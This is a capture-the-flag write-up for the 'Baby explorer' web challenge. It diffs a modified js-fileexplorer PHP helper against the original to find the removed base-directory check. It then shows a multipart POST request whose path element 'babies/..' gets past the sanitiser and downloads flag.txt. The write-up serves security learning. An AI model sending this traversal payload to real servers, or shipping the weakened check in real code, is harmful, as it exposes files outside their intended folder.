Tags: web php path-traversal
Rating:
# Baby explorer (web)
Writeup by: [xlr8or](https://ctftime.org/team/235001)
As part of this challenge we get a web endpoint to attack, and the source code of the frontend and the backend as well.
Inspecting the code we can figure out that the file explorer itself is from some opensource project
```php
```
We can look for the name of this class online, and find, that [this project](https://github.com/cubiclesoft/js-fileexplorer) was used to build the website.
This is useful, since the description of the challenge hints that the author remove some security check from the library, and we can just diff files with the original project, until we find something interesting.
Below are the results for the `server-side-helpers/file_exploerer_fs_helper.php` file:
```diff
41d40
< if (strncmp($result . "/", $basedir . "/", strlen($basedir) + 1)) return false;
140c139
< return substr_count($path, "/", strlen($basedir));
---
> return 5;
```
And inspecting the file we see that this is the body of the `GetPathDepth` function. This lead me to believe that there should be some sort of path traversal bug, that would allow us to inspect files outside of the constrained environment of baby pictures.
In fact, when making a request to list files a POST request with the following body is made:
```
-----------------------------40726375722058835313733066608
Content-Disposition: form-data; name="action"
file_explorer_refresh
-----------------------------40726375722058835313733066608
Content-Disposition: form-data; name="path"
["","babies"]
-----------------------------40726375722058835313733066608--
```
Just adding `..` as another element to this array will be rejected by the server. Let's investigate the function responsible for this:
```php
```
To get the path to list files of the `GetSanitizedPath` function is used, so let's check it out:
```php
```
1. we need to supply a path
2. a path needs to be sent as a JSON array
3. each element of the array should be a string
4. No elements should be `.` or `..`
5. Since dot folders are not allowed for us (from `index.php`) each element of the array should not begin with a dot
Other than this, the elements of the array are joined on `/` and we have a valid path.
However we could circumvent this by send an array like:
```
["","babies/.."]
```
This passes all the security checks, yet gives us a path that can escape the restricted folder.
Sending the following request will download the flag for us:
```
-----------------------------15206877564837423351244205007
Content-Disposition: form-data; name="action"
file_explorer_download
-----------------------------15206877564837423351244205007
Content-Disposition: form-data; name="path"
["", "babies/.."]
-----------------------------15206877564837423351244205007
Content-Disposition: form-data; name="ids"
["flag.txt"]
-----------------------------15206877564837423351244205007--
```